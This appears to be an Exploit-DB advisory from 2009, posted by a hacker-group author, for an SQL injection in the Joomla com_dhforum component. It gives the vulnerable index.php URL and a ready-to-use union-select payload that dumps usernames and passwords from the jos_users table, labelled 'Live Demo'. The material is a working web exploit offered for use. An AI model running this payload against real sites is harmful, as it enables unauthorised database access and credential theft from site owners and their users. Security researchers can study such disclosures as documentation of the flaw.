Joomla! Component com_dhforum - SQL Injection

EDB-ID:

10742


Author:

ViRuSMaN

Type:

webapps


Platform:

PHP

Date:

2009-12-27


==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


==============================================================================
======
[»] Joomla Component com_dhforum SQL Injection Vulnerability
========================================================================

======

[»] Script: [ joomla Component ]
[»] Language: [ PHP ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[»] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]



===[ Live Demo ]===

[»] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat

(username,0x3a,password)+from+jos_users--

Author: ViRuSMaN <-

###########################################################################